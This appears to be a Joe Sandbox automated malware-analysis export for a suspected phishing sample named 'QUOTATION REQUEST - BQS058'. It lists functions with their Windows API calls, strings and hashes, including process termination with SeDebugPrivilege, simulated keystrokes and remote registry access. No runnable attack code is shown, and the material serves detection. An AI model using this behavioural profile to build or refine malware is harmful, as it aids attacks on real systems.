GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0104F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0104FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0104FA7C
CloseHandle.KERNEL32(?), ref: 0104FAAB
CloseHandle.KERNEL32(?), ref: 0104FB22

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 4b3e66b079905b5dfa5f3c358f6e9e847e0c9d928697fe666eb37c7db406f829
Instruction ID: 8fc7268fac4884c9491ce326275fd8bd5f65e5336f8e88d27d1a2bc5ce4d32dd
Opcode Fuzzy Hash: 4b3e66b079905b5dfa5f3c358f6e9e847e0c9d928697fe666eb37c7db406f829
Instruction Fuzzy Hash: C4E1BE716043429FD714EF28C880A6EBBE1BF85314F18846EF9C58B2A2CB75ED45DB52

Function 01034CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01033697,?), ref: 0103468B

Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01033697,?), ref: 010346A4

Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32

lstrcmpiW.KERNEL32(?,?), ref: 01034D40
_wcscmp.LIBCMT ref: 01034D5A
MoveFileW.KERNEL32(?,?), ref: 01034D75

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d77fc9b5e3a52b0bc74374047df87f2d6ffc74871b55d776eafc16850fb4d839
Instruction ID: ec898ca6b20a341d38767590e832f54cbd4b661912f7c22bacbf3dd5ffae9991
Opcode Fuzzy Hash: d77fc9b5e3a52b0bc74374047df87f2d6ffc74871b55d776eafc16850fb4d839
Instruction Fuzzy Hash: 415150B20083459BC765EBA4DC849EFB7ECAFC4350F04092EA6C9D7151EE75A288C766

Function 01058645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010586FF

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 0dfc9f8a8397466400f5b75190d02880aa347d0609db541a4829faa100206189
Instruction ID: 9e174b3f15feabdabf2d77acd0a32fce722472ea2a136cfc1f369f7cb9015490
Opcode Fuzzy Hash: 0dfc9f8a8397466400f5b75190d02880aa347d0609db541a4829faa100206189
Instruction Fuzzy Hash: 9651B330500209BEEFA19A2A9C85FAF3FA5FB09750F108153FED1E61A1DB76E550CB61

Function 00FD2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0100C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0100C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0100C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0100C370
DestroyIcon.USER32(00000000), ref: 0100C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0100C39C
DestroyIcon.USER32(?), ref: 0100C3AB

Part of subcall function 0105A4AF: DeleteObject.GDI32(00000000), ref: 0105A4E8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 7c491a0b6bb17f0b828b9a58822d0b961a44d074379fb10fec4587a7dea6d967
Instruction ID: d921df3bb6c0bb4b1b933f53f61b1bb88b9e9a85165bb060b85e86c0d154e960
Opcode Fuzzy Hash: 7c491a0b6bb17f0b828b9a58822d0b961a44d074379fb10fec4587a7dea6d967
Instruction Fuzzy Hash: C1518D31A10205AFEB61DF24CC45BAA3BE6FB54310F14465AF982972D0DB75A940EB90

Function 0102966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0102A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0102A84C
Part of subcall function 0102A82C: GetCurrentThreadId.KERNEL32 ref: 0102A853
Part of subcall function 0102A82C: AttachThreadInput.USER32(00000000,?,01029683,?,00000001), ref: 0102A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0102968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010296AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 010296AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 010296B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 010296D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 010296D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 010296E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 010296F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 010296FB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1a642ba3f1c54f15452413d899fdaac73d72583821618fb946efcf77fbc69b21
Instruction ID: 37ae01af46eef0c4a657efd221394468a1cbfed8262c5f781c44eef0fc402f72
Opcode Fuzzy Hash: 1a642ba3f1c54f15452413d899fdaac73d72583821618fb946efcf77fbc69b21
Instruction Fuzzy Hash: 1A11C271910229BEF7206B709C49F6B3A5DDB4C754F100415F684AB090C9F75C10CBA8

Function 01028921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0102853C,00000B00,?,?), ref: 0102892A
HeapAlloc.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 01028931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0102853C,00000B00,?,?), ref: 01028946
GetCurrentProcess.KERNEL32(?,00000000,?,0102853C,00000B00,?,?), ref: 0102894E
DuplicateHandle.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 01028951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0102853C,00000B00,?,?), ref: 01028961
GetCurrentProcess.KERNEL32(0102853C,00000000,?,0102853C,00000B00,?,?), ref: 01028969
DuplicateHandle.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 0102896C
CreateThread.KERNEL32(00000000,00000000,01028992,00000000,00000000,00000000), ref: 01028986

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 9f6b570b3a51271e31605ef7a8c44be6857f11cf3716a320d9d55bc5a369fb19
Instruction ID: 96770bde61cf08d5dce314fdd869729277b243bc2a3a95d5d57bdce687f426ad
Opcode Fuzzy Hash: 9f6b570b3a51271e31605ef7a8c44be6857f11cf3716a320d9d55bc5a369fb19
Instruction Fuzzy Hash: 4D01B6B5240309BFEB20ABA5DC4DF6B3BACEB89711F408411FA45DB295CA799800CB25

Function 01049B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 01049BA4, 01049EC8
Not an Object type, xrefs: 01049B7B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 7db9f386647f39ece3fa35814f77ee75e4e1ce8b92d1bc2c99807339955cd763
Instruction ID: fd48ebd3c5273a1948910264a39633f8c3604dd3b60d4e5a463464fa68a18492
Opcode Fuzzy Hash: 7db9f386647f39ece3fa35814f77ee75e4e1ce8b92d1bc2c99807339955cd763
Instruction Fuzzy Hash: E5C183B1A0021A9BDF20DF59C884AAFB7F5FB48318F148479E985AB281E7719945CB90

Function 01049113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01049167
VariantInit.OLEAUT32(?), ref: 01049238
VariantInit.OLEAUT32(?), ref: 01049339
VariantClear.OLEAUT32(?), ref: 01049343
VariantClear.OLEAUT32(?), ref: 010493A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 010491C8, 010492F6, 010493AE
Incorrect Object type in FOR..IN loop, xrefs: 0104931C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: c56133435c75a4d91a3687b5df0d148aa575ff775af62a62b00e34df612a374d
Instruction ID: 1e4bd05a28d53828f684dd490e5d53da6a5edab667a183190efdc103ab70aabf
Opcode Fuzzy Hash: c56133435c75a4d91a3687b5df0d148aa575ff775af62a62b00e34df612a374d
Instruction Fuzzy Hash: A79194B1A00205ABDF24DF95C888FAFBBB8EF49715F008179F555AB281D7709901CFA0

Function 0104975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0102710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?,?,01027455), ref: 01027127
Part of subcall function 0102710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027142
Part of subcall function 0102710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027150
Part of subcall function 0102710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?), ref: 01027160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01049806
_memset.LIBCMT ref: 01049813
_memset.LIBCMT ref: 01049956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01049982
CoTaskMemFree.OLE32(?), ref: 0104998D

Strings

NULL Pointer assignment, xrefs: 010499DB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 24b779143ec6cf9a47f62b5609734a98799178d02054196baf8e3a1067e75225
Instruction ID: 6df166ff50e51a187317747fd7622486371941895d9b929b7af070c8786bc704
Opcode Fuzzy Hash: 24b779143ec6cf9a47f62b5609734a98799178d02054196baf8e3a1067e75225
Instruction Fuzzy Hash: 70914AB1D00219EBDF10DFA5DC84EDEBBB9BF08314F10416AE559A7281EB759A44CFA0

Function 01056D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01056E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 01056E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01056E52
_wcscat.LIBCMT ref: 01056EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 01056EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 01056EF2

Strings

SysListView32, xrefs: 01056DF6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 602b4b16253ad1d756cc0e473053dc49aecc29e8f5eafc030d974c84b8f01ed4
Instruction ID: 5dd860c67c00879a3e52313bd5215fe0ac0e420b92da30000d10e3f4da78e8a0
Opcode Fuzzy Hash: 602b4b16253ad1d756cc0e473053dc49aecc29e8f5eafc030d974c84b8f01ed4
Instruction Fuzzy Hash: F341A370900349ABEB619F68CC45BEF77E9EF08350F50046AF9C497191D6769984CB60

Function 0104E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 01033C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01033C7A
Part of subcall function 01033C55: Process32FirstW.KERNEL32(00000000,?), ref: 01033C88
Part of subcall function 01033C55: CloseHandle.KERNEL32(00000000), ref: 01033D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104E9A4
GetLastError.KERNEL32 ref: 0104E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0104EA63
GetLastError.KERNEL32(00000000), ref: 0104EA6E
CloseHandle.KERNEL32(00000000), ref: 0104EAA3

Strings

SeDebugPrivilege, xrefs: 0104E9C2

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 07036f79ba27721a30a28d95be100212a5fd6c1797eef6fa9a1989df6b6fda3c
Instruction ID: 6668dc5ad36f655dac17d3cdf3bf83c8c075e5f40d15566c96dd77d2e2697cc6
Opcode Fuzzy Hash: 07036f79ba27721a30a28d95be100212a5fd6c1797eef6fa9a1989df6b6fda3c
Instruction Fuzzy Hash: A041AC702042019FDB21EF54CC94F6EBBA5BF80714F088459F9829B3C2CBB9A814DB91

Function 01032F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 01033033

Strings

stop, xrefs: 01033004
question, xrefs: 01032FEC
warning, xrefs: 0103301C
blank, xrefs: 01032FB5
info, xrefs: 01032FD4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 8700a3b795317d258e1adadcd1eae4daf7df308a45a4b65dc5b31bbfcfaedec6
Instruction ID: 5c85fa966a1aceb86f144f148f1f986c9a6024e541f9a00df29eeed629812376
Opcode Fuzzy Hash: 8700a3b795317d258e1adadcd1eae4daf7df308a45a4b65dc5b31bbfcfaedec6
Instruction Fuzzy Hash: 5F112B3534C34ABEE7159A59DCD2C6FBBDCAF55320B10406AFA80AE182DB755A4056A0

Function 010342F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01034312
LoadStringW.USER32(00000000), ref: 01034319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0103432F
LoadStringW.USER32(00000000), ref: 01034336
_wprintf.LIBCMT ref: 0103435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0103437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 01034357

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 350b8be224b9220bc52fe645e4722d1d5020843c655aef1a8a4b6189a9e32a49
Instruction ID: f08482e0275acc221b7c5effc7a3da2f3358f4bdc438e22ff796e574b0b22e57
Opcode Fuzzy Hash: 350b8be224b9220bc52fe645e4722d1d5020843c655aef1a8a4b6189a9e32a49
Instruction Fuzzy Hash: E00162F2900309BFE761ABA4DD89EFB776CEB08200F404595BB85E6005EA7D5E854B74

Function 0105D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

GetSystemMetrics.USER32(0000000F), ref: 0105D47C
GetSystemMetrics.USER32(0000000F), ref: 0105D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0105D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0105D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0105D716
ShowWindow.USER32(00000003,00000000), ref: 0105D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0105D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0105D77D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 2f4789f7a0a14ed6a609ffe12303bafff3db7bb86eda16902f1127358c6565c5
Instruction ID: 26a5b0b235c8815c23b15a2f6130cb94c212c354b479b67704fb47d40c79201e
Opcode Fuzzy Hash: 2f4789f7a0a14ed6a609ffe12303bafff3db7bb86eda16902f1127358c6565c5
Instruction Fuzzy Hash: 2DB19D71500219EBDF94CFA8C5857AE7BF1FF08701F0480AAED889F299E735A950CB60

Function 0104FD11 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0104FDEE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 1d17af3282cbdfc178f1fcba1f399bc0f734cc0629f75009e89a87b20234e125
Instruction ID: 34522cbedcfa490bde3c70ce137d0df605226b28ca7d9559e0e7e012a644c1d9
Opcode Fuzzy Hash: 1d17af3282cbdfc178f1fcba1f399bc0f734cc0629f75009e89a87b20234e125
Instruction Fuzzy Hash: D7A18D712042029FDB10EF18C894F6EBBE5AF85314F08885DF9968B292DB79E945DF42

Function 00FD2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 00FD2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FD2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 0100C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 0100C286

Memory Dump Source

